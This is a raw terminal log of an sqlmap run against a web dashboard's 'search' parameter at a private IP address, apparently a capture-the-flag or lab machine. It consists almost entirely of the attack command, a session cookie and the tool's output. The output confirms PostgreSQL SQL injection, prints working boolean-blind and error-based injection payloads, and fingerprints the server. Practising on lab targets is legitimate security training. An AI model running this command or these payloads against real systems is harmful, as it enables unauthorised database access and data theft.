└──╼ $sqlmap -u 'http://10.129.149.84/dashboard.php?search=a' --cookie='PHPSESSID=ibubfif67ebkdul9tlg4o9q1f9'
___
__H__
___ ___[(]_____ ___ ___  {1.5.9#stable}
|_ -| . [,]     | .'| . |
|___|_  [']_|_|_|__,|  _|
|_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 22:35:11 /2021-10-28/

[22:35:11] [INFO] testing connection to the target URL
[22:35:19] [INFO] testing if the target URL content is stable
[22:35:19] [INFO] target URL content is stable
[22:35:19] [INFO] testing if GET parameter 'search' is dynamic
[22:35:19] [INFO] GET parameter 'search' appears to be dynamic
[22:35:37] [INFO] heuristic (basic) test shows that GET parameter 'search' might be injectable (possible DBMS: 'PostgreSQL')
[22:35:37] [INFO] heuristic (XSS) test shows that GET parameter 'search' might be vulnerable to cross-site scripting (XSS) attacks
[22:35:37] [INFO] testing for SQL injection on GET parameter 'search'
it looks like the back-end DBMS is 'PostgreSQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
for the remaining tests, do you want to include all tests for 'PostgreSQL' extending provided level (1) and risk (1) values? [Y/n] y
	[22:35:50] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[22:36:21] [WARNING] there is a possibility that the target (or WAF/IPS) is dropping 'suspicious' requests
[22:36:21] [CRITICAL] connection timed out to the target URL. sqlmap is going to retry the request(s)
[22:36:22] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[22:36:22] [INFO] testing 'Generic inline queries'
[22:36:22] [INFO] testing 'PostgreSQL AND boolean-based blind - WHERE or HAVING clause (CAST)'
[22:36:23] [INFO] GET parameter 'search' appears to be 'PostgreSQL AND boolean-based blind - WHERE or HAVING clause (CAST)' injectable (with --string="SUV")
[22:36:23] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[22:36:23] [INFO] GET parameter 'search' is 'PostgreSQL AND error-based - WHERE or HAVING clause' injectable 
[22:36:23] [INFO] testing 'PostgreSQL inline queries'
[22:36:23] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[22:36:23] [WARNING] time-based comparison requires larger statistical model, please wait....... (done)                                                                                                                                    
[22:36:24] [CRITICAL] considerable lagging has been detected in connection response(s). Please use as high value for option '--time-sec' as possible (e.g. 10 or more)
[22:36:29] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[22:36:35] [INFO] testing 'PostgreSQL stacked queries (heavy query - comment)'
[22:36:36] [INFO] testing 'PostgreSQL stacked queries (heavy query)'
[22:36:37] [INFO] testing 'PostgreSQL < 8.2 stacked queries (Glibc - comment)'
[22:36:37] [INFO] testing 'PostgreSQL < 8.2 stacked queries (Glibc)'
[22:36:37] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[22:36:42] [INFO] testing 'PostgreSQL > 8.1 OR time-based blind'
[22:36:48] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind (comment)'
[22:36:53] [INFO] testing 'PostgreSQL > 8.1 OR time-based blind (comment)'
[22:36:58] [INFO] testing 'PostgreSQL AND time-based blind (heavy query)'
[22:36:59] [INFO] testing 'PostgreSQL OR time-based blind (heavy query)'
[22:37:00] [INFO] testing 'PostgreSQL AND time-based blind (heavy query - comment)'
[22:37:02] [INFO] testing 'PostgreSQL OR time-based blind (heavy query - comment)'
[22:37:03] [INFO] testing 'PostgreSQL > 8.1 time-based blind - Parameter replace'
[22:37:03] [INFO] testing 'PostgreSQL time-based blind - Parameter replace (heavy query)'
[22:37:03] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
GET parameter 'search' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
sqlmap identified the following injection point(s) with a total of 42 HTTP(s) requests:
---
Parameter: search (GET)
Type: boolean-based blind
Title: PostgreSQL AND boolean-based blind - WHERE or HAVING clause (CAST)
Payload: search=a' AND (SELECT (CASE WHEN (8507=8507) THEN NULL ELSE CAST((CHR(107)||CHR(81)||CHR(73)||CHR(114)) AS NUMERIC) END)) IS NULL-- vLGP

Type: error-based
Title: PostgreSQL AND error-based - WHERE or HAVING clause
Payload: search=a' AND 3865=CAST((CHR(113)||CHR(122)||CHR(120)||CHR(106)||CHR(113))||(SELECT (CASE WHEN (3865=3865) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(122)||CHR(113)||CHR(112)||CHR(113)) AS NUMERIC)-- EXWL
---
[22:37:10] [INFO] the back-end DBMS is PostgreSQL
web server operating system: Linux Ubuntu 19.10 or 20.04 (eoan or focal)
web application technology: Apache 2.4.41
back-end DBMS: PostgreSQL
[22:37:11] [INFO] fetched data logged to text files under '/home/nair0lf32/.local/share/sqlmap/output/10.129.149.84'

[*] ending @ 22:37:11 /2021-10-28/

